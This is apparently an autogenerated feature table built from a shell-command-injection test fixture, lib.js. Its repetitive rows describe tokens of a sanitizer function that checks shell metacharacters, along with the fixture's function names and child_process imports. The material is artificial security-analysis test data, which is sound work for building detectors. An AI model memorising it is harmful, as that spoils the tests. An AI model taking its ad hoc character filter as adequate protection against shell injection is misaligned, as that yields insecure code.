autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:379:4:379:7 | s[i] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:379:4:379:7 | s[i] | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:379:4:379:7 | s[i] | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:379:4:379:7 | s[i] | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:379:4:379:7 | s[i] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:379:4:379:15 | s[i] === '<' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:379:4:379:15 | s[i] === '<' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:379:4:379:15 | s[i] === '<' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:379:4:379:15 | s[i] === '<' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:379:4:379:15 | s[i] === '<' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:379:6:379:6 | i | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:379:6:379:6 | i | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:379:6:379:6 | i | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:379:6:379:6 | i | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:379:6:379:6 | i | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:379:13:379:15 | '<' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:379:13:379:15 | '<' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:379:13:379:15 | '<' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:379:13:379:15 | '<' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:379:13:379:15 | '<' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:380:4:380:4 | s | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:380:4:380:4 | s | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:380:4:380:4 | s | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:380:4:380:4 | s | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:380:4:380:4 | s | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:380:4:380:7 | s[i] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:380:4:380:7 | s[i] | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:380:4:380:7 | s[i] | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:380:4:380:7 | s[i] | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:380:4:380:7 | s[i] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:380:4:380:15 | s[i] === '*' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:380:4:380:15 | s[i] === '*' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:380:4:380:15 | s[i] === '*' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:380:4:380:15 | s[i] === '*' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:380:4:380:15 | s[i] === '*' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:380:6:380:6 | i | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:380:6:380:6 | i | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:380:6:380:6 | i | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:380:6:380:6 | i | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:380:6:380:6 | i | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:380:13:380:15 | '*' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:380:13:380:15 | '*' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:380:13:380:15 | '*' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:380:13:380:15 | '*' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:380:13:380:15 | '*' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:381:4:381:4 | s | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:381:4:381:4 | s | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:381:4:381:4 | s | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:381:4:381:4 | s | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:381:4:381:4 | s | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:381:4:381:7 | s[i] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:381:4:381:7 | s[i] | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:381:4:381:7 | s[i] | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:381:4:381:7 | s[i] | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:381:4:381:7 | s[i] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:381:4:381:15 | s[i] === '?' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:381:4:381:15 | s[i] === '?' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:381:4:381:15 | s[i] === '?' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:381:4:381:15 | s[i] === '?' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:381:4:381:15 | s[i] === '?' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:381:6:381:6 | i | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:381:6:381:6 | i | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:381:6:381:6 | i | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:381:6:381:6 | i | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:381:6:381:6 | i | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:381:13:381:15 | '?' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:381:13:381:15 | '?' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:381:13:381:15 | '?' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:381:13:381:15 | '?' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:381:13:381:15 | '?' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| 